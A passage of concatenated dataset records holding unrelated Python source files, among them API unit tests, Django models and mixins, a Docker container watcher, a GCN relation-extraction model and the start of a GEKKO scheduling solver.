#随机选取UDE中某一数据,更新部分字段。重新读取判断更新是否成功\n def test_004(self):\n #获取随机选择2016100600-2016101300时间段内某一数据,获取其rowkey值\n resp = tools.requests_Getapi(\"http://hdh8:9200/hik_smart_metadata-2016100600-2016101300/_search\",\"get\")\n if len(resp[\"hits\"][\"hits\"])>0:\n dateELASTIC_old[\"rowKey\"] = resp[\"hits\"][\"hits\"][random.randint(0,9)][\"_source\"][\"rowKey\"]\n #通过rowkey值反查数据属性及其对应参数值\n resp = tools.requests_Posttext(\"http://hdh8:4848/SqlServlet\",'sql=select * from HIK_SMART_METADATA where rowKey=\"{0}\"'.format(dateELASTIC_old[\"rowKey\"]))\n resp = json.loads(resp)\n #将查询到的数据保存至dateELASTIC_old (固定五个属性值)\n dateELASTIC_old[resp[\"result\"][\"fields\"][4]] = resp[\"result\"][\"rows\"][0][\"row\"][4] #plate\n dateELASTIC_old[resp[\"result\"][\"fields\"][9]] = resp[\"result\"][\"rows\"][0][\"row\"][9] #bag\n dateELASTIC_old[resp[\"result\"][\"fields\"][27]] = 2 #brand\n dateELASTIC_old[resp[\"result\"][\"fields\"][32]] = resp[\"result\"][\"rows\"][0][\"row\"][32] #hat\n dateELASTIC_old[resp[\"result\"][\"fields\"][59]] = resp[\"result\"][\"rows\"][0][\"row\"][59] #glass\n #print(\"dateELASTIC_old:\",dateELASTIC_old)\n #修改数据属性值,并保存在dateELASTIC中\n dateELASTIC[\"plate\"] = dateELASTIC_old[\"plate\"]+\"1\"\n dateELASTIC[\"bag\"] = dateELASTIC_old[\"bag\"]+\"1\"\n dateELASTIC[\"brand\"] = dateELASTIC_old[\"brand\"]+1\n dateELASTIC[\"hat\"] = dateELASTIC_old[\"hat\"]+\"1\"\n dateELASTIC[\"glass\"] = dateELASTIC_old[\"glass\"]+\"1\"\n dateELASTIC[\"rowKey\"] = dateELASTIC_old[\"rowKey\"]\n\n dateELASTIC_new = json.dumps(dateELASTIC)\n #print(\"dateELASTIC_new:\",dateELASTIC_new)\n #使用接口更新数据\n requestDateJson[\"ws:updateFields\"][\"fieldJson\"]=dateELASTIC_new\n response =tools.requests_xml(requestUrl,requestDateJson)\n resp = tools.getresReturn(response,\"updateFields\")\n resp = json.loads(resp)\n #根据接口返回结果判断状态\n self.assertEquals(resp[\"ret\"],\"0\")\n self.assertEquals(resp[\"msg\"],\"更新成功\")\n self.assertEquals(resp[\"data\"],\"更新成功\")\n #二次查询数据属性值\n resp = tools.requests_Posttext(\"http://hdh8:4848/SqlServlet\",'sql=select * from HIK_SMART_METADATA where rowKey=\"{0}\"'.format(dateELASTIC_old[\"rowKey\"]))\n resp = json.loads(resp)\n #将获取到的数据属性值,重新保存在dateELASTIC中\n dateELASTIC_1[resp[\"result\"][\"fields\"][4]] = resp[\"result\"][\"rows\"][0][\"row\"][4] #plate\n dateELASTIC_1[resp[\"result\"][\"fields\"][9]] = resp[\"result\"][\"rows\"][0][\"row\"][9] #bag\n dateELASTIC_1[resp[\"result\"][\"fields\"][27]] = 2 #brand\n dateELASTIC_1[resp[\"result\"][\"fields\"][32]] = resp[\"result\"][\"rows\"][0][\"row\"][32] #hat\n dateELASTIC_1[resp[\"result\"][\"fields\"][59]] = resp[\"result\"][\"rows\"][0][\"row\"][59] #glass\n #将二次获取属性值与老数据进行对比\n #print(\"dateELASTIC_1\",dateELASTIC_1)\n for i in [\"plate\",\"bag\",\"brand\",\"hat\",\"glass\"]:\n self.assertNotEqual(str(dateELASTIC[i])==str(dateELASTIC_new[i]))\n\n\nif __name__ == '__main__':\n unittest.main() ","sub_path":"TestCaseWorkspace/Datafile_Case/VSP_/Version_1.0.2/IHSRNetWebService8580/updateFields.py","file_name":"updateFields.py","file_ext":"py","file_size_in_byte":6138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"221442162","text":"# This is a demo to read a file\n\nfilename = \"text.txt\"\n\nwith open(filename) as file:\n content = file.readlines()\n print(content)\n\ndestination = \"summer holiday at beach\"\nmySlice = destination[0:6]\nprint(mySlice)\n\nimport time\n\ntimenow = time.localtime(time.time())\n# print(timenow)\n\ntimeIs = time.asctime()\nprint(timeIs)\n\ntimeIs = time.ctime()\nprint(timeIs)\n\ntry:\n open(\"tet.txt\")\nexcept:\n print(\"File not found\")\n","sub_path":"LanguageBasics/readingFiles.py","file_name":"readingFiles.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"500810124","text":"import ray\nimport argparse\n\nfrom env.inventory_env import InventoryManageEnv\nfrom env.inventory_utils import Utils\nfrom scheduler.inventory_random_policy import ProducerBaselinePolicy, BaselinePolicy\n\nfrom scheduler.inventory_eoq_policy import ConsumerEOQPolicy as ConsumerBaselinePolicy\n\nfrom config.inventory_config import env_config\nfrom utility.visualization import visualization\n\n\nfrom scheduler.inventory_dqn_baseline import ConsumerDQNTorchPolicy\nfrom scheduler.Trainer import Trainer\nimport numpy as np\nimport os\nfrom utility.tensorboard import TensorBoard\nfrom scheduler.forecasting_model import Forecasting_model\n\n# Configuration ===============================================================================\n\nforecast_mode_config_default = {\n \"hist_len\": 21,\n \"fore_len\": 3,\n \"batch_size\": 128,\n \"training_steps\": 10000,\n \"evaluation_steps\": 200,\n \"train_round\": 50,\n\n}\n\ndef train_forecasting_model(args):\n if not os.path.exists('train_log'):\n os.mkdir('train_log')\n writer = TensorBoard(f'train_log/{args.run_name}')\n print(\" == start training forecasting model ==\")\n forecast_config = forecast_mode_config_default.copy()\n forecast_model = Forecasting_model(forecast_config)\n for i in range(forecast_config['train_round']):\n eval_loss = forecast_model.eval_one_round(forecast_config['evaluation_steps'])\n train_loss = forecast_model.train_one_round(forecast_config['training_steps'])\n\n print(f\"round {i}\")\n print(f\"train_loss: max: {np.max(train_loss):13.6f} mean: {np.mean(train_loss):13.6f} min: {np.min(train_loss):13.6f}\")\n print(f\"eval_loss: max: {np.max(eval_loss):13.6f} mean: {np.mean(eval_loss):13.6f} min: {np.min(eval_loss):13.6f}\")\n writer.add_scalar('ztrain/train_loss', np.mean(train_loss), i)\n writer.add_scalar('ztrain/eval_loss', np.mean(eval_loss), i)\n forecast_model.eval_all(f'train_log/{args.run_name}')\n return forecast_model\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--torch\", action=\"store_true\")\nparser.add_argument(\"--batch-size\", type=int, default=2048)\nparser.add_argument(\"--use-prev-action-reward\", action=\"store_true\")\nparser.add_argument(\"--num-iterations\", type=int, default=1000)\nparser.add_argument(\"--visualization-frequency\", type=int, default=100)\nparser.add_argument(\"--run-name\", type=str, default='1223_forecasting_hid32_sigmoid_2layer_train_more')\n\nif __name__ == \"__main__\":\n args = parser.parse_args()\n train_forecasting_model(args)\n\n","sub_path":"RLPolicy/inventory_train_forecasting.py","file_name":"inventory_train_forecasting.py","file_ext":"py","file_size_in_byte":2512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"213875225","text":"from braces.views import LoginRequiredMixin\nfrom django.core.exceptions import PermissionDenied\nfrom django.shortcuts import (\n get_object_or_404,\n redirect\n)\n\nfrom contacts.models import (\n Book,\n BookOwner,\n)\n\n\nclass BookOwnerMixin(LoginRequiredMixin):\n\n def get_queryset(self):\n if self.kwargs.get('book'):\n try:\n bookowner = BookOwner.objects.get(\n user=self.request.user,\n book_id=self.kwargs.get('book'),\n )\n return self.model.objects.for_user(\n self.request.user, book=bookowner.book,\n )\n except BookOwner.DoesNotExist:\n pass\n return self.model.objects.for_user(self.request.user)\n\n def get_object(self, queryset=None):\n instance = super(BookOwnerMixin, self).get_object(queryset)\n\n if not instance.can_be_viewed_by(self.request.user):\n raise PermissionDenied\n\n return instance\n\n def form_valid(self, form):\n form.instance.book = BookOwner.objects.get(\n user=self.request.user\n ).book\n response = super(BookOwnerMixin, self).form_valid(form)\n\n return response\n","sub_path":"contacts/views/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"153648641","text":"import warnings\nimport gzip\nimport io\nfrom .utils import Client\nfrom astropy.io.fits import HDUList\nfrom astropy.io.fits import open as fits_open\nfrom urllib.error import HTTPError\nfrom alerce.search import AlerceSearch\nfrom alerce.exceptions import CandidError\n\n\nclass AlerceStamps(Client):\n search_client = AlerceSearch()\n\n def __init__(self, **kwargs):\n default_config = {\n \"AVRO_URL\": \"https://avro.alerce.online\",\n \"AVRO_ROUTES\": {\"get_stamp\": \"/get_stamp\", \"get_avro\": \"/get_avro\"},\n }\n default_config.update(kwargs)\n super().__init__(**default_config)\n\n def _in_ipynb(self):\n try:\n from IPython import get_ipython\n import os\n\n if \"IPKernelApp\" not in get_ipython().config: # pragma: no cover\n raise ImportError(\"console\")\n return False\n if \"VSCODE_PID\" in os.environ: # pragma: no cover\n raise ImportError(\"vscode\")\n return False\n except Exception as e:\n return False\n else: # pragma: no cover\n return True\n\n def _get_first_detection(self, oid):\n detections = self.search_client.query_detections(oid, format=\"pandas\")\n first_detection = detections[detections.has_stamp].candid.astype(\"int64\").min()\n try:\n first_detection = int(first_detection)\n except TypeError:\n raise CandidError()\n return first_detection\n\n def plot_stamps(self, oid, candid=None):\n \"\"\"\n Plot stamp in a notebook given oid. It uses IPython HTML.\n\n Parameters\n ----------\n oid : :py:class:`str`\n object ID in ALeRCE DBs.\n candid : :py:class:`int`\n Candid of the stamp to be displayed.\n\n Returns\n -------\n Display the stamps on a jupyter notebook.\n \"\"\"\n if not self._in_ipynb():\n warnings.warn(\"This method only works on Notebooks\", RuntimeWarning)\n return\n\n if candid is None:\n candid = self._get_first_detection(oid)\n\n from IPython.display import HTML\n\n science = \"%s?oid=%s&candid=%s&type=science&format=png\" % (\n self.config[\"AVRO_URL\"] + self.config[\"AVRO_ROUTES\"][\"get_stamp\"],\n oid,\n candid,\n )\n template = science.replace(\"science\", \"template\")\n difference = science.replace(\"science\", \"difference\")\n images = \"\"\"\n
ZTF oid: %s, candid: %s
\n
     \n Science\n             \n Template\n             \n Difference\n
\n
\n
\n
\n
\n \"\"\" % (\n oid,\n candid,\n science,\n template,\n difference,\n )\n display(HTML(images))\n\n def get_stamps(self, oid, candid=None, format=\"HDUList\"):\n \"\"\"Download Stamps for an specific alert.\n\n Parameters\n ----------\n oid : :py:class:`str`\n object ID in ALeRCE DBs.\n candid : :py:class:`int`\n Candid of the stamp to be displayed.\n format : :py:class: `str`\n Output format [HDUList|numpy]\n\n Returns\n -------\n Science, Template and Difference stamps for an specific alert.\n \"\"\"\n if candid is None:\n candid = self._get_first_detection(oid)\n try:\n stamp_types = [\"science\", \"template\", \"difference\"]\n stamp_list = []\n for stamp_type in stamp_types:\n url = \"%s?oid=%s&candid=%s&type=%s&format=fits\" % (\n self.config[\"AVRO_URL\"] + self.config[\"AVRO_ROUTES\"][\"get_stamp\"],\n oid,\n candid,\n stamp_type,\n )\n\n http_response = self.session.request(\"GET\", url)\n\n with gzip.open(io.BytesIO(http_response.content), \"rb\") as f:\n tmp_hdulist = fits_open(\n io.BytesIO(f.read()), ignore_missing_simple=True\n )\n\n stamp_list.append(tmp_hdulist[0])\n\n if format == \"HDUList\":\n hdulist = HDUList()\n for stamp, stamp_type in zip(stamp_list, stamp_types):\n stamp.header[\"STAMP_TYPE\"] = stamp_type\n hdulist.append(stamp)\n return hdulist\n elif format == \"numpy\":\n return [stamp.data.copy() for stamp in stamp_list]\n except HTTPError:\n warnings.warn(\"AVRO File not found.\", RuntimeWarning)\n return None\n\n def get_avro(self, oid, candid=None):\n \"\"\"Download avro of some alert.\n\n Parameters\n ----------\n oid : :py:class:`str`\n object ID in ALeRCE DBs.\n candid : :py:class:`int`\n Candid of the avro to be downloaded.\n\n Returns\n -------\n Avro of a given alert.\n \"\"\"\n if candid is None:\n candid = self._get_first_detection(oid)\n try:\n url = self.config[\"AVRO_URL\"] + self.config[\"AVRO_ROUTES\"][\"get_avro\"]\n params = {\"oid\": oid, \"candid\": candid}\n http_response = self.session.request(\"GET\", url, params=params)\n return http_response.content\n except HTTPError:\n warnings.warn(\"AVRO File not found.\", RuntimeWarning)\n return None\n","sub_path":"alerce/stamps.py","file_name":"stamps.py","file_ext":"py","file_size_in_byte":5812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"384683446","text":"from django.conf import settings\nfrom django.core.validators import MinValueValidator, MaxValueValidator\nfrom django.db import models\nimport datetime\n\nfrom django.db.models.signals import pre_save\n\nfrom localomddata.models.commonFields import CommonFields\nfrom localomddata.models.product import Product\nfrom localomddata.models.slot import Slot\n\n\nclass OrderMainManager(models.Manager):\n def submitted(self, *args, **kwargs):\n return super(OrderMainManager, self).filter(status='0')\n def finished(self):\n return super(OrderMainManager, self).filter(status='2')\n def byOrderNo(self, *args):\n return super(OrderMainManager, self).filter(orderNo=args[0])\n\n\n\npredicateDict = {\n \"OrderMain.slot\": \"orders\", \"OrderMain.user\": \"orders\"\n}\nPayType = {\n (\"0\", \"现金\"), (\"1\", \"会员\"),(\"3\",\"微信\"),(\"4\", \"支付宝\")\n}\nStatus = {\n (\"0\", \"已提交\"), (\"1\", \"已支付\"),(\"2\", \"已完成\")\n}\n\n\ndef createOrderNo(instance):\n thisday = datetime.date.today();\n orderPrefix = '{:02d}'.format(thisday.month)+'{:02d}'.format(thisday.day)\n qs = OrderMain.objects.filter(orderNo__startswith=orderPrefix).order_by(\"-orderNo\")\n if qs.exists():\n orderNo = \"%s\" % (int(qs.first().orderNo) + 1)\n else:\n orderNo = orderPrefix + '0000'\n return orderNo\n\nclass OrderMain(CommonFields):\n user = models.ForeignKey(settings.AUTH_USER_MODEL, related_name=predicateDict[\"OrderMain.user\"], default=1, verbose_name = \"创建人\")\n slot = models.ForeignKey(Slot, related_name=\"orders\", on_delete=models.SET_NULL, blank=True, null=True, verbose_name = \"货道\")\n product = models.ForeignKey(Product, related_name=\"orders\", on_delete=models.SET_NULL, blank=True, null=True, verbose_name = \"商品\")\n itemCount = models.PositiveSmallIntegerField(default=1, validators=[MaxValueValidator(64), MinValueValidator(1)])\n orderNo = models.CharField(\"订单号\", max_length=8, default=createOrderNo)\n payType = models.CharField(\"支付类型\", max_length=1, choices=PayType, default=\"0\")\n status = models.CharField(\"订单状态\", max_length=1, choices=Status, default = '0')\n totalPaid = models.DecimalField(\"支付金额\", max_digits=3, decimal_places=0)\n class Meta:\n verbose_name = verbose_name_plural = \"09. 订单查看\"\n def __str__(self):\n return self.orderNo\n\n\n\ndef createTotalPaid(instance):\n product = Product.objects.get(pk=instance.product.id)\n return product.saleUnitPrice * instance.itemCount;\n\ndef pre_save_vm_receiver(sender, instance, *args, **kwargs):\n if not instance.orderNo:\n instance.orderNo = createOrderNo(instance)\n if not instance.totalPaid:\n instance.totalPaid = createTotalPaid(instance)\n\n\npre_save.connect(pre_save_vm_receiver, sender=OrderMain)","sub_path":"django/localomd/localomddata/models/ordermain.py","file_name":"ordermain.py","file_ext":"py","file_size_in_byte":2775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"598894978","text":"from openpyxl import load_workbook\nfrom singleton import Singleton\n\nclass handleExcelData(Singleton):\n def __init__(self, excel_path, name=None):\n self.execl_path = excel_path\n self.name = name\n wb = load_workbook(self.execl_path)\n if self.name is None:\n self.ws = wb.active\n\n else:\n self.ws = wb[self.name]\n self.head_date_tuple = tuple(self.ws.iter_rows(max_row=1, values_only=True))[0]\n # self.head_date_tuple=[i.value for i in self.ws[1]]\n\n def getExcelData(self):\n\n one_list = []\n for one_tuple in tuple(self.ws.iter_rows(min_row=2, values_only=True)):\n one_list.append(dict(zip(self.head_date_tuple, one_tuple)))\n return one_list\n # rows=list(self.ws.rows)\n # datas=[]\n # for row in rows[1:]:\n # data=[]\n # for cell in row:\n # data.append(cell.value)\n # data_dict=dict(zip(self.head_date_tuple,data))\n # datas.append(data_dict)\n # return datas\n\n\n def write_data(self, row, request):\n if isinstance(row, int) and (2 <= row <= self.ws.max_row):\n self.ws.cell(row, column=self.head_date_tuple.index(\"request\") + 1, value=request)\n self.ws.save(self.execl_path)\n\n\nif __name__ == '__main__':\n do_excelData = handleExcelData(excel_path=\"D:\\demo\\新建 XLSX 工作表.xlsx\")\n do_excelData.getExcelData()\n","sub_path":"webDemo/common/handleExecl.py","file_name":"handleExecl.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"245888755","text":"\"\"\"\nGCN model for relation extraction.\n\"\"\"\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nimport numpy as np\n\nfrom model.layers import GCN, pool\nfrom model.tree import Tree, head_to_tree, tree_to_adj\nfrom utils import constant, torch_utils\n\nclass GCNClassifier(nn.Module):\n \"\"\" A wrapper classifier for GCNRelationModel. \"\"\"\n def __init__(self, opt, emb_matrix=None):\n super().__init__()\n self.gcn_model = GCNRelationModel(opt, emb_matrix=emb_matrix)\n in_dim = opt['hidden_dim']\n self.classifier = nn.Linear(in_dim, opt['num_class'])\n self.opt = opt\n\n def conv_l2(self):\n return self.gcn_model.gcn.conv_l2()\n\n def forward(self, inputs):\n outputs, pooling_output = self.gcn_model(inputs)\n logits = self.classifier(outputs)\n return logits, pooling_output\n\nclass GCNRelationModel(nn.Module):\n def __init__(self, opt, emb_matrix=None):\n super(GCNRelationModel, self).__init__()\n self.opt = opt\n self.emb_matrix = emb_matrix\n\n # create embedding layers\n self.emb = nn.Embedding(opt['vocab_size'], opt['emb_dim'], padding_idx=constant.PAD_ID)\n self.pos_emb = nn.Embedding(len(constant.POS_TO_ID), opt['pos_dim']) if opt['pos_dim'] > 0 else None\n self.ner_emb = nn.Embedding(len(constant.NER_TO_ID), opt['ner_dim']) if opt['ner_dim'] > 0 else None\n\n embeddings = (self.emb, self.pos_emb, self.ner_emb)\n self.init_embeddings()\n\n self.gcn = GCN(opt, embeddings, opt['hidden_dim'], opt['num_layers'])\n\n # output mlp layers\n in_dim = opt['hidden_dim'] * 3\n\n layers = [nn.Linear(in_dim, opt['hidden_dim']), nn.ReLU()]\n for _ in range(self.opt['mlp_layers'] - 1):\n layers += [nn.Linear(opt['hidden_dim'], opt['hidden_dim']), nn.ReLU()]\n self.out_mlp = nn.Sequential(*layers)\n \n def init_embeddings(self):\n if self.emb_matrix is None:\n self.emb.weight.data[1:, :].unifrom_(-1.0, 1.0)\n else:\n self.emb_matrix = torch.from_numpy(self.emb_matrix)\n self.emb.weight.data.copy_(self.emb_matrix)\n # decide finetuning\n if self.opt['topn'] <= 0:\n print(\"Do not finetune word embedding layer.\")\n self.emb.weight.requires_grad = False\n elif self.opt['topn'] < self.opt['vocab_size']:\n print(\"Finetune top {} word embeddings.\".format(self.opt['topn']))\n self.emb.weight.register_hook(lambda x: \\\n torch_utils.keep_partial_grad(x, self.opt['topn']))\n else:\n print(\"Finetune all embeddings.\")\n \n def forward(self, inputs):\n words, masks, pos, ner, deprel, head, subj_pos, obj_pos, subj_type, obj_type = inputs # unpack\n seq_length = (masks.data.cpu().numpy() == 0).astype(np.int64).sum(1)\n maxlen = max(seq_length)\n\n def inputs_to_tree_reps(head, words, l, prune, subj_pos, obj_pos):\n head, words, subj_pos, obj_pos = head.cpu().numpy(), words.cpu().numpy(), subj_pos.cpu().numpy(), obj_pos.cpu().numpy()\n trees = [head_to_tree(head[i], words[i], l[i], prune, subj_pos[i], obj_pos[i]) for i in range(len(l))]\n adj = [tree_to_adj(maxlen, tree, directed=False, self_loop=False).reshape(1, maxlen, maxlen) for tree in trees]\n adj = np.concatenate(adj, axis=0)\n adj = torch.from_numpy(adj)\n return Variable(adj.cuda()) if self.opt['cuda'] else Variable(adj)\n \n adj = inputs_to_tree_reps(head.data, words.data, seq_length, self.opt['prune_k'], subj_pos.data, obj_pos.data)\n h, pool_mask = self.gcn(adj, inputs)\n\n # pooling\n # pooling\n subj_mask, obj_mask = subj_pos.eq(0).eq(0).unsqueeze(2), obj_pos.eq(0).eq(0).unsqueeze(2) # invert mask\n pool_type = self.opt['pooling']\n h_out = pool(h, pool_mask, type=pool_type)\n subj_out = pool(h, subj_mask, type=pool_type)\n obj_out = pool(h, obj_mask, type=pool_type)\n outputs = torch.cat([h_out, subj_out, obj_out], dim=1)\n outputs = self.out_mlp(outputs)\n return outputs, h_out\n","sub_path":"model/cgcn.py","file_name":"cgcn.py","file_ext":"py","file_size_in_byte":4184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"385154976","text":"#!/usr/bin/env python\n\n# -*- coding:utf-8 -*-\n\n#An Algorithm for Matching Delimiters\n#page 239\nimport stack2\n\ndef is_matched(expr):\n\t\"\"\"\n\t\treturn True if all delimiters are properly match;\n\t\"\"\"\n\n\tlefty = '({['\n\trighty = ')}]'\n\n\tS = stack2.ArrayStack()\n\n\tprint (type(S))\n\n\tfor c in expr:\n\t\tif c in lefty:\n\t\t\tS.push(c)\n\t\telif c in righty:\n\t\t\tif S.is_empty:\n\t\t\t\treturn False\n\t\t\tif righty.index(c) != lefty.index(S.pop()):\n\t\t\t\treturn False\n\t\treturn S.is_empty()\n\t\t\n\ndef is_matched_html(raw):\n\tS = ArrayStack()\n\tj = raw.find('<')\n\twhile j != -1:\n\t\tk = raw.find('>', j+1)\n\t\tif k == -1:\n\t\t\treturn False\n\t\ttag = raw[j+1:k]\n\t\tif not tag.startswith('/'):\n\t\t\tS.push(tag)\n\t\telse:\n\t\t\tif S.is_empty():\n\t\t\t\treturn False\n\tj = raw.find('<', k + 1)\n\n\treturn S.is_empty()\n","sub_path":"dataStructor/stack_matched.py","file_name":"stack_matched.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"388564691","text":"from torchvision import datasets, transforms\nfrom torch.utils.data import DataLoader\n\nfrom config import MNIST_PATH, BATCH_SIZE_TRAIN, BATCH_SIZE_TEST, MNIST_INFO\n\n\ntransform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((MNIST_INFO['MEAN'],), (MNIST_INFO['STD'],))\n])\n\n\ndef load_data(train=True, transforms=transforms) -> DataLoader:\n data_set = datasets.MNIST(MNIST_PATH, download=True, train=train, transform=transform)\n batch_size = BATCH_SIZE_TRAIN if train else BATCH_SIZE_TEST\n data_loader = DataLoader(data_set, batch_size=batch_size, shuffle=True)\n\n return data_loader\n","sub_path":"load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"75286059","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@Time : 2020/10/12 9:13\n@Author : liufubin\n@FileName: test_registry_api.py\n@description: 华润项目填写注册接口请求\n\"\"\"\nimport unittest\nimport random\nimport time\nfrom public_method.request_method import RequestMethod\nfrom request_date.china_resource.registry_request import RegistryRequestDate\nfrom public_method.connect_redis import ConnectRedis\n\n\nclass TestRegistryRequest(unittest.TestCase):\n isskip = ['yes']\n\n def setUp(self) -> None:\n pass\n\n # @unittest.skipIf(isskip == 'no', '用例跳过')\n def test_didnot_apply_code(self):\n \"\"\"未申请验证码注册场景,没有调用获取验证码接口\"\"\"\n response = RequestMethod.http_post_method(requesturl=RegistryRequestDate.registry_request_url,\n headers=RegistryRequestDate.registry_request_header,\n body=RegistryRequestDate.registry_request_body)\n response = response.json()\n self.assertTrue(response['data']['message'] == '未申请验证码' and response['data']['code'] == 407, '没有申请验证码未报未申请验证码的错')\n\n # @unittest.skipIf(isskip == 'no', '用例跳过')\n def test_normal_registry(self):\n \"\"\"正常注册,先调用获取验证码接口,得到code和cookie,请求注册接口\"\"\"\n registry_cellphone = random.randint(10000000, 99999999) # 获取手机号后八位随机号码\n registry_time = time.time() # 获取当前时间时间戳\n get_session, getresponse = RequestMethod.request_get_method( # 调获取code接口,会在redis中生成code码\n 'http://mom-test.simuwang.com/momapi/v1/system/userMgt/'\n 'getSmsCode?mobile=130{}®isterOrNot=true&'\n 't={}'\n .format(registry_cellphone, registry_time))\n cookie_value = 'JSESSIONID={}'.format(get_session['JSESSIONID'])\n registry_code = ConnectRedis().redis_get('\"USER_CELLPHOME_130{}\"'.format(registry_cellphone)) # 获取redis中的code码\n # registry_code = int(re.sub(\"\\\"\", '', registry_code))\n print(registry_code)\n registry_code = registry_code.replace(\"\\\"\", \"\") # 因为redis的数据是带双引号的,需要去除\n RegistryRequestDate.registry_request_body['code'] = registry_code\n RegistryRequestDate.registry_request_body['cellphone'] = '130{}'.format(registry_cellphone)\n RegistryRequestDate.registry_request_header['Cookie'] = cookie_value # 请求header需要带cookie\n response = RequestMethod.http_post_method(requesturl=RegistryRequestDate.registry_request_url, # 调用注册接口\n headers=RegistryRequestDate.registry_request_header,\n body=RegistryRequestDate.registry_request_body)\n del RegistryRequestDate.registry_request_header['Cookie']\n response = response.json()\n self.assertTrue(response['data']['result'] == 'success' and response['data']['code'] == 200, '注册失败,该用例应该注册成功')\n\n # @unittest.skipIf(isskip == 'no', '用例跳过')\n def test_already_registry_cellphone(self):\n \"\"\"手机号与申请的手机号不一致,先调用获取验证码接口,得到code和cookie,请求注册接口\"\"\"\n registry_cellphone = random.randint(10000000, 99999999) # 获取手机号后八位随机号码\n registry_time = time.time() # 获取当前时间时间戳\n get_session, getresponse = RequestMethod().request_get_method('http://192.168.1.37:8080' # 调code接口\n '/momapi/v1/system/userMgt/getSmsCode?'\n 'mobile=130{}&®isterOrNot=truet={}'\n .format(registry_cellphone, registry_time))\n print(get_session)\n cookie_value = 'JSESSIONID={}'.format(get_session['JSESSIONID'])\n registry_code = ConnectRedis().redis_get('USER_CELLPHOME_130{}'.format(registry_cellphone)) # 获取redis中的code码\n # registry_code = int(re.sub(\"\\\"\", '', registry_code))\n registry_code = registry_code.replace(\"\\\"\", \"\") # 因为redis的数据是带双引号的,需要去除\n RegistryRequestDate.registry_request_body['code'] = registry_code\n RegistryRequestDate.registry_request_body['cellphone'] = '13055866828'\n RegistryRequestDate.registry_request_header['Cookie'] = cookie_value # 请求header需要带cookie\n response = RequestMethod().http_post_method(requesturl=RegistryRequestDate.registry_request_url, # 调用注册接口\n headers=RegistryRequestDate.registry_request_header,\n body=RegistryRequestDate.registry_request_body)\n del RegistryRequestDate.registry_request_header['Cookie'] # 删除hreder字段中的cookie,避免影响其他用例\n response = response.json()\n self.assertTrue(response['data']['message'] == '手机号与申请验证码的手机号不一致'\n and response['data']['code'] == 407, '手机号不一致没有报不一致错误')\n\n # def test_delete_user(self):\n # \"\"\"删除自动化跑的用户,先找出创建的,并提取返回元组中的userid,逐条调用删除接口删除\"\"\"\n # sql = \"SELECT \tuserid FROM rz_combination_master.cm_user WHERE username LIKE '姓名%'\"\n # sql_result = ConnectMysql().fetchall(sql)\n # print(type(sql_result))\n # for i in sql_result:\n # response = RequestMethod.request_delete_method('http://192.168.1.37:8080/momapi/v1/'\n # 'system/userMgt/delUserByUserId?userId={}'.format(i[0]))\n # print(response)\n\n\nif __name__ == '__main__':\n # registry_response = RegistryRequest()\n TestRegistryRequest().test_normal_registry()\n","sub_path":"test_case/custom_system/china_resource/test_registry_api.py","file_name":"test_registry_api.py","file_ext":"py","file_size_in_byte":6291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"200146699","text":"# -*- coding: UTF-8 -*-\nimport docker\n\nclient = docker.from_env()\n\n\nclass ContainerStatus(object):\n exited = 'exited'\n running = 'running'\n restarting = 'restarting'\n paused = 'paused'\n\n\ndef print_container(container):\n print(f'{container.short_id} {container.name} {container.status}')\n\n\ndef report_all_containers():\n for c in client.containers.list(all=True):\n print_container(c)\n\n\ndef run():\n for event in client.events(decode=True):\n if event.get('Type') == 'container':\n name = event.get('from')\n container = client.containers.get(name)\n if container is None:\n print(f'container \"{name}\" not found')\n continue\n\n if container.status == ContainerStatus.exited:\n container.start()\n container.reload()\n","sub_path":"moni/watcher.py","file_name":"watcher.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"3499325","text":"from gekko import GEKKO\nimport networkx as nx\nimport random\nimport plotly.figure_factory as ff\nfrom fractions import Fraction as frac\n\n\ndef init_solver(mrt, G, num_tasks, w, order, task_scaling=False):\n \"\"\"\n prepares the optimization equation by adding the necessary constraints\n :param mrt: Boolean variable that is True if objective is to optimize for \n MRT + E, False if objective is to optimize Makespan + E.\n :param G: DAG to schedule\n :param num_tasks: total number of tasks\n :param order: ordering\n :param task_scaling: Boolean whether to scale tasks or not\n :return: m, s, c\n \"\"\"\n m = GEKKO()\n\n # Use IPOPT solver (default)\n m.options.SOLVER = 3\n\n # Change to parallel linear solver\n m.solver_options = ['linear_solver ma97']\n\n # create array\n s = m.Array(m.Var, num_tasks)\n for i in range(num_tasks):\n s[i].value = 2.0\n s[i].lower = 0\n\n # define completion time of each task\n c = m.Array(m.Var, num_tasks)\n for i in range(num_tasks):\n c[i].value = 0\n c[i].lower = 0\n\n # 1b\n # task's completion time must be later than the time to run task itself\n for i in range(num_tasks):\n m.Equation(w[i] / s[i] <= c[i])\n\n # 1c\n # task must start later than all ancestors\n for i in range(num_tasks):\n for j in nx.algorithms.ancestors(G, i):\n m.Equation(c[j] + (w[i] / s[i]) <= c[i])\n\n\n # task must start later than previous task on machine\n resource_constraints = 